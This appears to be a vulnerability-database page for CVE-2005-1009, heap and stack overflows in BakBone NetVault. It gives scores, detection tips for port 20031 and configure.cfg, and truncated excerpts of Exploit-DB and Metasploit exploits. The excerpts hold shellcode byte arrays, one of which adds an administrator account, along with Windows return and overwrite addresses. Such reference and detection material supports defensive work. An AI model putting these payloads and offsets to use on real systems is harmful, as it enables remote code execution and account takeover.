CVE-2005-1009
published 2005-05-02CVE-2005-1009: Multiple buffer overflows in BakBone NetVault 6.x and 7.x allow (1) remote attackers to execute arbitrary code via a modified computer name and length that…
PriorityP356critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
57.02%
98.9th percentile
Multiple buffer overflows in BakBone NetVault 6.x and 7.x allow (1) remote attackers to execute arbitrary code via a modified computer name and length that leads to a heap-based buffer overflow, or (2) local users to execute arbitrary code via a long Name entry in the configure.cfg file.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bakbone | netvault | — | — |
| bakbone | netvault | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x0a (JMP short at offset 32790) + \x7e\x6d\x03\x75 (ret Win2k SP4) / \x7c\x36\x9b\xbd (ret WinXP SP0/SP1)
bytes↗
ret Win2k SP4: \x7e\x6d\x03\x75; UEF Win2k SP4: \x4c\x14\x54\x7c; ret WinXP SP1: \xbd\x9b\x36\x7c; UEF WinXP SP1: \xb4\x73\xed\x77
bytes↗
\x81\xc4\xff\xef\xff\xff\x44 (PrependEncoder / stack adjustment)
bytes↗
char vul[]="\x4E\x61\x6D\x65\x3D"; ("Name=" — vulnerable cfg key)bytes↗
char esp[]="\xDD\x20\x02\x10"; (local exploit return address)
- →The exploit sends the overflow buffer multiple times (up to 15 reconnections) to trigger the heap corruption; detect repeated large TCP connections to port 20031 from the same source IP within seconds. ↗
- →For the local exploit vector, monitor writes to configure.cfg in the NetVault installation directory for a 'Name=' entry that is abnormally long (stack buffer overflow trigger). ↗
- →The version check response from a vulnerable NetVault server contains the string 'NVBuild'; use this to fingerprint exposed services on port 20031. ↗
- ·Return addresses and UEF overwrites are OS/SP-specific. The exploit targets Windows 2000 SP4 and Windows XP SP0/SP1 English only; different patch levels or locales require different gadget addresses. ↗
- ·The payload bad characters are \x00 and \x20 (null byte and space); shellcode or signatures containing these bytes will not be delivered correctly by the exploit. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BakBone NetVault - Remote Heap Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2005-1009 BakBone NetVault - Remote Heap Overflow (Metasploit)
BakBone NetVault - Remote Heap Overflow (Metasploit)
---
##
# $Id: bakbone_netvault_heap.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BakBone NetVault Remote Heap Overflow',
'Description' => %q{
This module exploits a heap overflow in the BakBone NetVault
Process Manager service. This code is a direct port of the netvault.c
code written by nolimit and BuzzDee.
},
'Author' => [ 'hdm', '' ],
'Version' => '$Revision: 10394 $',
'References' =>
[
['CVE', '2005-1009'],
['OSVDB', '15234'],
['BID', '12967'
Exploit-DB
BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)
exploitdb·2005-05-17
CVE-2005-1547 BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)
BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (1)
---
/* Bakbone Netvault heap overflow exploit.
Software Hole discovered by BuzzDee
POC written by nolimit and BuzzDee.
As class101 has already shown, this application has a lot of holes.
This is another remote heap overflow. This was tested on the demo version
of netvault. We considered mailing the vendor on this one, but figured we'd recieve
the same response class did, which was none. So perhaps a second critical vulnerabilty
will wake Bakbone up to their software faults.
A note to skiddies about this exploit
This won't really net you a lot of elite b0xes because class101's isn't patched,
so it's just as vulnerable as this. Not to mention the fact that not many businesses
use this software anyway.
..Maybe it's because of all
Exploit-DB
BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)
exploitdb·2005-04-01
CVE-2005-1009 BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)
BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)
---
/*
for more informations class101.org/netv-remhbof.pdf
*/
#include
#include
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif
char scode1[]=
"\x33\xC9\x83\xE9"
"\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
"\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
"\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
"\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
"\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
"\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
"\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
"
Exploit-DB
BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow
exploitdb·2005-04-01
CVE-2005-1009 BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow
BakBone NetVault 6.x/7.x - Local Stack Buffer Overflow
---
/*
for more informations class101.org/netv-locsbof.pdf
*/
#include
#include
#ifdef WIN32
#include "winsock2.h"
#pragma comment(lib, "ws2_32")
#else
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#endif
char scode1[]=
/*add u:class101 p:class101 (*Administrators *users)*/
"\x33\xC9\x83\xE9\xC7\xE8\xFF\xFF\xFF\xFF\xC0\x5E\x81\x76\x0E\x15"
"\x90\x39\xE8\x83\xEE\xFC\xE2\xF4\xE9\x78\x7F\xE8\x15\x90\xB2\xAD"
"\x29\x1B\x45\xED\x6D\x91\xD6\x63\x5A\x88\xB2\xB7\x35\x91\xD2\x0B"
"\x3B\xD9\xB2\xDC\x9E\x91\xD7\xD9\xD5\x09\x95\x6C\xD5\xE4\x3E\x29"
"\xDF\x9D\x38\x2A\xFE\x64\x02\xBC\x31\x94\x4C\x0B\x9E\xCF\x1D\xE9"
"\xFE\xF6\xB2\xE4\x5E\x1B\x66\xF4\x14\x7B\xB2\xF4\x9E\x91\xD2\x61"
"\x49\xB4\x3D\x2B\x2
Metasploit
BakBone NetVault Remote Heap Overflow
metasploit
BakBone NetVault Remote Heap Overflow
BakBone NetVault Remote Heap Overflow
This module exploits a heap overflow in the BakBone NetVault Process Manager service. This code is a direct port of the netvault.c code written by nolimit and BuzzDee.
http://secunia.com/advisories/14814http://securitytracker.com/id?1013625http://www.class101.org/netv-locsbof.pdfhttp://www.class101.org/netv-remhbof.pdfhttp://www.hat-squad.com/en/000164.htmlhttp://www.hat-squad.com/en/000165.htmlhttp://www.securityfocus.com/archive/1/394801http://www.securityfocus.com/bid/12967https://exchange.xforce.ibmcloud.com/vulnerabilities/19932http://secunia.com/advisories/14814http://securitytracker.com/id?1013625http://www.class101.org/netv-locsbof.pdfhttp://www.class101.org/netv-remhbof.pdfhttp://www.hat-squad.com/en/000164.htmlhttp://www.hat-squad.com/en/000165.htmlhttp://www.securityfocus.com/archive/1/394801http://www.securityfocus.com/bid/12967https://exchange.xforce.ibmcloud.com/vulnerabilities/19932
2005-05-02
Published